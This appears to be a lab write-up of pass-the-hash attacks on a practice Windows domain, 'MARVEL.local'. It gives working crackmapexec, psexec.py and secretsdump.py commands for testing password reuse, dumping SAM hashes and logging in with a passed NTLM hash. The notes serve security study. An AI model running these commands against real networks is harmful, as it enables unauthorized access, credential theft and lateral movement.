# Pass The Hash

I used a tool called as crackmapexec to check the reusage of password on other machines on the same domain:

`crackmapexec smb 192.168.64.0/24 -u fcastle -d MARVEL.local -p Password1`

`crackmapexec smb 192.168.64.0/24 -u fcastle -d MARVEL.local -p Password1 —sam`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FmrxOsT4q64wWMSwjeFzj%2Fimage.png?alt=media&#x26;token=b8993c11-3c95-4d43-a278-1f58d544ca24" alt=""><figcaption></figcaption></figure></div>

Once I had the computer names where I can log into, I used a tool called as psexec to login into those computers: psexec.py marvel/fcastle:Password1\@192.168.64.153

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FrCz3SRw81n6zyz7k7ZgK%2Fimage.png?alt=media&#x26;token=2808e0c9-be42-4545-896f-9e45050d1b46" alt=""><figcaption></figcaption></figure></div>

I even used a tool called as secretsdump.py to dump the hashes: secretsdump.py marvel/fcastle:Password1\@192.168.64.153

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FhlJu71GLHu0QyTbywdyM%2Fimage.png?alt=media&#x26;token=5a04d75b-8973-498d-adfb-a9b2a083c8f0" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2Fhh2bchJMY5IGEqw0K147%2Fimage.png?alt=media&#x26;token=c3eb9f9f-0e25-414c-8efb-25fcaaacb3d0" alt=""><figcaption></figcaption></figure></div>

NTLM hashes can be passed. NTLMv2 hashes cannot be passed. SAM database hashes are these. We can then crack these hashes using hashcat.

I can even check if the hash is used on other machine on the same domain: `crackmapexec smb 192.168.64.0/24 -u "Frank Castle" -H 64f12cddaa88057e06a81b54e73b949b --local-auth`

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FZdnGnbViIgzMeYBUA7hF%2Fimage.png?alt=media&#x26;token=df460631-06dd-4e1c-8674-42605b819adb" alt=""><figcaption></figcaption></figure></div>

We can even use a hash along with psexec tool: psexec.py "frank castle":@192.168.64.153 -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b

<div align="left"><figure><img src="https://1900160215-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-M8BnwqwOpw0p82p0cMp%2Fuploads%2FVWMauF6Ue8GK8ab8Hgz1%2Fimage.png?alt=media&#x26;token=c948bed3-a091-40b5-85a4-33ed4a64b6a2" alt=""><figcaption></figcaption></figure></div>